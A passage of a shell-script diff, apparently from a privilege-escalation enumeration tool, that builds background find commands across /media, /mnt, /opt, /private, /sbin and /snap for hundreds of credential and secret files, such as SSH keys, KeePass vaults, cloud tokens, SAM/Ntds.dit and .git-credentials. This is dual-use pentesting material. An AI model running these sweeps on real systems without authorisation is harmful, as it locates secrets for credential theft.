"find /media -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name 
\"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o 
-name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" 
-o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name 
\"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name 
\"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o 
-name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find /private -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name 
\"AzureRMContext.json\" -o -name \"error.log\" -o -name \"agent*\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name 
\"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_RUN=`eval_bckgrd "find /run -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_SBIN=`eval_bckgrd "find /sbin -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" 
-o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name 
\"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SNAP=`eval_bckgrd "find /snap -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name 
\"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" 